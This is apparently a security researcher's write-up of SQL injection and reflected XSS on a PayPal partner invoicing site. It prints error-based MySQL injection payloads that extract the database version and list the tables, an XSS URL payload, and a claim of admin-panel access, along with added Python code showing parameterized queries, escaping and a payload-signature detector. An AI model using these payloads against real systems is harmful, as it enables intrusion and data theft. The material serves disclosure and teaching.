Paypal Partner SQL Injection

One of the PayPal Partner websites, http://ppinvoice.com/, was vulnerable to SQL injection through a POST parameter of its login form. A UNION-based injection was not possible here.

[code language="sql"]
LoginForm[email]=-1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23
&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]


Since the UNION attempt only produces the error shown above and cannot be taken further, a double-query (error-based) injection works perfectly instead.

[code language="sql"]
LoginForm[email]=1' and(select 1 from(select count(*),concat((select
(select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1%23
&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]

[code language="sql"]
LoginForm[email]=1' or 1 GROUP BY concat_ws(' :: ',version(),
user(),database(),@@license,@@hostname,floor(rand(0)*2)) having min(0) or
1%23
&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]


Dumping the database was easy, since there was no WAF or any other kind of filtering in place. Of the tables returned, let's look at the admin table.

[code language="sql"]
LoginForm[email]=1' or (@:=1)||@ group by concat((select substr(
group_concat(' :: ',table_name),1,450) from information_schema.tables
WHERE table_schema=database()),@:=@-1) having @||min(@:=0)%23
&LoginForm[password]=3&LoginForm[rememberMe]=3&LoginForm[verifyCode]=3&yt0=3
[/code]
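The root cause behind all of the requests above is a login query that splices the email field straight into SQL text, and the error-based payloads work only because the resulting database error surfaces. The script below is an added example, not code from the original post or from the site: it puts a string-formatted login lookup beside its parameterized equivalent, shows that a single stray quote breaks the first but is harmless to the second, and adds a small request-body check for the error-based signature the writeup uses (floor(rand(0)*2) with GROUP BY ... HAVING, or information_schema reads), which is the sort of filtering the site lacked. The admin table, its columns and the sample rows are assumptions, and SQLite stands in for MySQL so it runs offline.

```python
"""Vulnerable vs. parameterized login lookup, plus a request-body check.

Added example, not code from the original post or from the site: the writeup
shows a Yii-style login form (LoginForm[email]) whose email value is spliced
into a MySQL query. The admin table and its columns are assumptions, and SQLite
stands in for MySQL so the script runs offline; the behaviour shown (a quote
in the input rewrites the query) is the same on both engines.
"""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one admin row in a throw-away in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("INSERT INTO admin (email, password) VALUES ('admin@example.invalid', 'hunter2')")
    conn.commit()
    return conn


def login_vulnerable(conn, email: str, password: str):
    """Builds the statement by string formatting: input becomes part of the SQL text."""
    sql = (f"SELECT id FROM admin WHERE email = '{email}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, email: str, password: str):
    """Parameterized statement: values travel separately, so quotes stay data."""
    sql = "SELECT id FROM admin WHERE email = ? AND password = ?"
    return conn.execute(sql, (email, password)).fetchone()


# Signatures of the error-based (double-query) shape used in the writeup:
# floor(rand(0)*2) combined with GROUP BY ... HAVING, or information_schema reads.
_SQLI_PATTERNS = [
    re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    re.compile(r"\bgroup\s+by\b.*\bhaving\b", re.I | re.S),
    re.compile(r"information_schema\.", re.I),
]


def looks_like_error_based_sqli(body: str) -> bool:
    """True if a URL-decoded request body carries one of the signatures above."""
    return any(p.search(body) for p in _SQLI_PATTERNS)


def demo() -> dict:
    """Runs both login variants against normal and hostile input; returns the results."""
    conn = make_db()
    out = {}
    out["vuln_valid"] = login_vulnerable(conn, "admin@example.invalid", "hunter2")
    out["safe_valid"] = login_safe(conn, "admin@example.invalid", "hunter2")
    # A single stray quote breaks the hand-built query. That database error is
    # exactly the signal the writeup's error-based payloads rely on.
    try:
        login_vulnerable(conn, "-1'", "x")
        out["vuln_quote"] = "no error"
    except sqlite3.Error as exc:
        out["vuln_quote"] = f"db error: {exc}"
    out["safe_quote"] = login_safe(conn, "-1'", "x")
    # The "1' or 1 ... %23" shape from the writeup replaces the WHERE clause;
    # SQLite's line comment is -- where MySQL also accepts #.
    out["vuln_bypass"] = login_vulnerable(conn, "x' OR 1=1 -- ", "wrong")
    out["safe_bypass"] = login_safe(conn, "x' OR 1=1 -- ", "wrong")
    # Constructed, URL-decoded POST bodies: one benign, one in the writeup's shape.
    out["flag_benign"] = looks_like_error_based_sqli(
        "LoginForm[email]=admin@example.invalid&LoginForm[password]=hunter2")
    out["flag_hostile"] = looks_like_error_based_sqli(
        "LoginForm[email]=1' or 1 GROUP BY concat_ws(' :: ',version(),"
        "floor(rand(0)*2)) having min(0) or 1#&LoginForm[password]=3")
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:13} {value!r}")
```

The parameterized version fixes the bug; the signature check is only a backstop that would have made the requests in this writeup visible in logs, and it should never be the sole control, since the payload shapes are easy to vary.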


So finally I was able to log into their admin panel 😉


That's not all: there is also a reflected XSS.

[code language="text"]
http://ppinvoice.com/index.php/faq/faqlist?id=4?><svg/onload="prompt('Hello There')">
[/code]
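The id parameter is echoed into the page without encoding, which is why the tag in the URL runs. The following is an added example, not the site's code: it reflects the parameter the vulnerable way beside a version that validates it as an integer and HTML-escapes anything that fails validation. The page template, the way the parameter is extracted and the assumption that id is numeric are all mine, and the sample URL is constructed.

```python
"""Reflected parameter rendering: vulnerable vs. validated and escaped.

Added example, not the site's code: the writeup shows faq/faqlist reflecting
its id parameter into the page unescaped. The page template, the parameter
extraction and the expectation that id is numeric are assumptions.
"""
import html
from typing import Optional
from urllib.parse import parse_qs, urlsplit


def id_param(url: str) -> str:
    """Pull the raw id value out of the query string (first occurrence, may be empty)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get("id", [""])[0]


def render_vulnerable(raw_id: str) -> str:
    """Interpolates the raw value: markup in the parameter becomes markup in the page."""
    return f"<h2>FAQ</h2><p>Showing FAQ list for id={raw_id}</p>"


def parse_faq_id(raw_id: str) -> Optional[int]:
    """Input validation: an FAQ id should be a plain non-negative integer."""
    return int(raw_id) if raw_id.isdigit() else None


def render_safe(raw_id: str) -> str:
    """Validates first; if that fails, the value is only ever shown HTML-escaped."""
    faq_id = parse_faq_id(raw_id)
    if faq_id is None:
        shown = html.escape(raw_id, quote=True)   # < > & " ' become entities
        return f"<h2>FAQ</h2><p>No FAQ list for id={shown}</p>"
    return f"<h2>FAQ</h2><p>Showing FAQ list for id={faq_id}</p>"


# Constructed sample URL in the same shape as the writeup's proof of concept.
POC_URL = "http://example.invalid/index.php/faq/faqlist?id=4?><svg/onload=\"prompt('Hello There')\">"


if __name__ == "__main__":
    raw = id_param(POC_URL)
    print("vulnerable:", render_vulnerable(raw))
    print("safe:      ", render_safe(raw))
```

Validation alone is not enough on a page that must echo free-form text, and escaping alone is not enough where the value is used as a number, so the safe version does both: reject what is not an id, and entity-encode whatever is shown back.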


The copyright notice also mentions Cisco.


I reported this to PayPal, and they said it was out of scope. Recently, though, I saw that another researcher's report of issues in a different PayPal Partner website running SILK software was accepted, while mine was not. The issue seems to be in the SILK software. They appear to be a third party to PayPal, and according to their webpage they are also a Magento Solution Provider.
